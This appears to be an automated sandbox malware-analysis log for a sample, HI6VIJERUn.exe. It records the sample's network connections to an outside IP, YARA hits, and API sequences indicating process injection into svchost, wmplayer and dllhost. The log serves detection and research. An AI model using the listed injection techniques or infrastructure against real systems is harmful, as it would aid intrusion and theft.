                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877594268.0000422C0054C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                      Source: chrome.exe, 00000013.00000002.1880967636.0000422C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                      Source: chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49844 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 92.255.85.148:443 -> 192.168.2.11:49860 version: TLS 1.2
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                      Source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_120a729e-1
                      Source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_f612f6dd-1
                      Source: Yara matchFile source: 15.3.svchost.exe.1c2785c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.Hop.com.24368620000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.Hop.com.24368900000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.svchost.exe.1c2785c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.svchost.exe.1c2782e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.Hop.com.24368900000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.svchost.exe.1c2782e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Hop.com PID: 4120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4188, type: MEMORYSTR
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB08CC CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess,15_3_00007DF426AB08CC
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E64C0 NtQuerySystemInformation,NtQuerySystemInformation,GetTokenInformation,CloseHandle,CloseHandle,14_2_00000243665E64C0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E8AE0 NtQuerySystemInformation,malloc,NtQuerySystemInformation,K32GetProcessImageFileNameW,14_2_00000243665E8AE0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E5FA0 NtQueryInformationProcess,14_2_00000243665E5FA0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABE3E8 NtAcceptConnectPort,15_3_00007DF426ABE3E8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABE3C8 NtAcceptConnectPort,15_3_00007DF426ABE3C8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABE25C NtAcceptConnectPort,15_3_00007DF426ABE25C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABF180 RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free,15_3_00007DF426ABF180
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABF32C calloc,NtAcceptConnectPort,15_3_00007DF426ABF32C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AC0344 NtAcceptConnectPort,CreateThread,TerminateThread,free,15_3_00007DF426AC0344
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AC0280 NtAcceptConnectPort,15_3_00007DF426AC0280
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABE170 NtAcceptConnectPort,15_3_00007DF426ABE170
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABE150 NtAcceptConnectPort,15_3_00007DF426ABE150
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABE094 NtAcceptConnectPort,15_3_00007DF426ABE094
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABFEE8 NtAcceptConnectPort,malloc,NtAcceptConnectPort,K32GetProcessImageFileNameW,15_3_00007DF426ABFEE8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABE910 calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort,15_3_00007DF426ABE910
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276405FA0 NtQueryInformationProcess,15_2_000001C276405FA0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_3_00007DF4F81A1958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,35_3_00007DF4F81A1958
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_3_00007DF4F81A1CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free,35_3_00007DF4F81A1CE8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE3158 NtAcceptConnectPort,35_2_0000021AB2FE3158
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE290C NtAcceptConnectPort,35_2_0000021AB2FE290C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE2A20 NtAcceptConnectPort,35_2_0000021AB2FE2A20
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE2DAC NtAcceptConnectPort,35_2_0000021AB2FE2DAC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE2D80 NtAcceptConnectPort,35_2_0000021AB2FE2D80
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE2EC8 NtAcceptConnectPort,35_2_0000021AB2FE2EC8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE2E84 NtAcceptConnectPort,35_2_0000021AB2FE2E84
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE2DDC NtAcceptConnectPort,35_2_0000021AB2FE2DDC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE2CAC NtAcceptConnectPort,35_2_0000021AB2FE2CAC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81A199C calloc,NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,35_2_00007DF4F81A199C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81A1E64 CreateProcessW,NtResumeThread,CloseHandle,35_2_00007DF4F81A1E64
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81B25D4 NtQuerySystemInformation,free,NtQuerySystemInformation,35_2_00007DF4F81B25D4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F8202E90 NtQuerySystemInformation,malloc,NtQuerySystemInformation,35_2_00007DF4F8202E90
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C73970 NtQuerySystemInformation,36_2_000001F269C73970
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile created: C:\Windows\WhatMedJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile created: C:\Windows\SessionDeviationJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile created: C:\Windows\PurpleCuttingJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_0040737E0_2_0040737E
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406EFE0_2_00406EFE
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_004079A20_2_004079A2
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_004049A80_2_004049A8
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C45BD4412_2_00007FF68C45BD44
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C443D7012_2_00007FF68C443D70
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4DAE1012_2_00007FF68C4DAE10
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C467DFC12_2_00007FF68C467DFC
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C43AEC012_2_00007FF68C43AEC0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C442EE012_2_00007FF68C442EE0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4E1F4012_2_00007FF68C4E1F40
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C462F6C12_2_00007FF68C462F6C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C45BFC012_2_00007FF68C45BFC0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C44203B12_2_00007FF68C44203B
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C44F07012_2_00007FF68C44F070
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C47512C12_2_00007FF68C47512C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C43B9B012_2_00007FF68C43B9B0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C44095012_2_00007FF68C440950
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C44EAA812_2_00007FF68C44EAA8
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C472BB012_2_00007FF68C472BB0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4C8CB012_2_00007FF68C4C8CB0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C476C7412_2_00007FF68C476C74
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4615E012_2_00007FF68C4615E0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C47668012_2_00007FF68C476680
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C46A65012_2_00007FF68C46A650
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4716D012_2_00007FF68C4716D0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4676EC12_2_00007FF68C4676EC
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C43879012_2_00007FF68C438790
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C45F76012_2_00007FF68C45F760
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C43282012_2_00007FF68C432820
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C44182012_2_00007FF68C441820
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C45C28C12_2_00007FF68C45C28C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C47229012_2_00007FF68C472290
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4DC28412_2_00007FF68C4DC284
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C46827012_2_00007FF68C468270
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C44626012_2_00007FF68C446260
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C45436412_2_00007FF68C454364
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C46936012_2_00007FF68C469360
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C45549C12_2_00007FF68C45549C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C43452812_2_00007FF68C434528
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4324D412_2_00007FF68C4324D4
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E51BC14_2_00000243665E51BC
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665EB43C14_2_00000243665EB43C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E442C14_2_00000243665E442C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E7FE814_2_00000243665E7FE8
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E9E9814_2_00000243665E9E98
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E9B4C14_2_00000243665E9B4C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E150014_2_00000243665E1500
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E2F0014_2_00000243665E2F00
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665EE4EA14_2_00000243665EE4EA
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E69D814_2_00000243665E69D8
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F5E8D14_2_00000243665F5E8D
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830F1C015_3_000001C27830F1C0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783F899415_3_000001C2783F8994
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783EF18815_3_000001C2783EF188
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831F9F815_3_000001C27831F9F8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F21E015_3_000001C2782F21E0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FEA3015_3_000001C2782FEA30
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278301A1F15_3_000001C278301A1F
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278324A5015_3_000001C278324A50
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830AA5015_3_000001C27830AA50
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831BA5015_3_000001C27831BA50
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FE2B415_3_000001C2782FE2B4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783242BC15_3_000001C2783242BC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783D629815_3_000001C2783D6298
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783142A015_3_000001C2783142A0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783DA30015_3_000001C2783DA300
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FF2F815_3_000001C2782FF2F8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F62E415_3_000001C2782F62E4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278323B4015_3_000001C278323B40
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278302B2015_3_000001C278302B20
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278304B1015_3_000001C278304B10
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831DB7415_3_000001C27831DB74
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782EAB8015_3_000001C2782EAB80
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783D9B6415_3_000001C2783D9B64
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FA35015_3_000001C2782FA350
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278316B6015_3_000001C278316B60
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E136015_3_000001C2782E1360
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278321BBC15_3_000001C278321BBC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E33A415_3_000001C2782E33A4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783773F415_3_000001C2783773F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E83E415_3_000001C2782E83E4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783EB3E815_3_000001C2783EB3E8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278371BF015_3_000001C278371BF0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783E73E415_3_000001C2783E73E4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F0C4015_3_000001C2782F0C40
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278306C2C15_3_000001C278306C2C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783D447C15_3_000001C2783D447C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278322C7015_3_000001C278322C70
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F344C15_3_000001C2782F344C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E9CB015_3_000001C2782E9CB0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E949015_3_000001C2782E9490
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E2C8815_3_000001C2782E2C88
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278310CA015_3_000001C278310CA0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FDD4015_3_000001C2782FDD40
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783B4D3015_3_000001C2783B4D30
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27837BD2015_3_000001C27837BD20
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831D52015_3_000001C27831D520
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278303D2015_3_000001C278303D20
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830950415_3_000001C278309504
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27832250D15_3_000001C27832250D
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27837258015_3_000001C278372580
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E1D8015_3_000001C2782E1D80
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830C56015_3_000001C27830C560
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830356015_3_000001C278303560
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27832559415_3_000001C278325594
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278302D9015_3_000001C278302D90
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278300DE415_3_000001C278300DE4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278306DF015_3_000001C278306DF0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783EEDE015_3_000001C2783EEDE0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F9DE015_3_000001C2782F9DE0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783065D015_3_000001C2783065D0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278378E1C15_3_000001C278378E1C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278309E2015_3_000001C278309E20
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830960915_3_000001C278309609
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FBE1815_3_000001C2782FBE18
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830868015_3_000001C278308680
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783EDEBC15_3_000001C2783EDEBC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FB6B415_3_000001C2782FB6B4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830B6B015_3_000001C27830B6B0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278325E9415_3_000001C278325E94
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831B6D415_3_000001C27831B6D4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FD6D815_3_000001C2782FD6D8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783EEED415_3_000001C2783EEED4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F06E015_3_000001C2782F06E0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783D8F2015_3_000001C2783D8F20
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278317F7C15_3_000001C278317F7C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830E78015_3_000001C27830E780
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278308F7015_3_000001C278308F70
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782ED74815_3_000001C2782ED748
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782ECF6015_3_000001C2782ECF60
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E4F5C15_3_000001C2782E4F5C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783227B215_3_000001C2783227B2
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27835F7AC15_3_000001C27835F7AC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FC79015_3_000001C2782FC790
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830F7F415_3_000001C27830F7F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830500015_3_000001C278305000
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783D5FD815_3_000001C2783D5FD8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783037E015_3_000001C2783037E0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F6FE015_3_000001C2782F6FE0
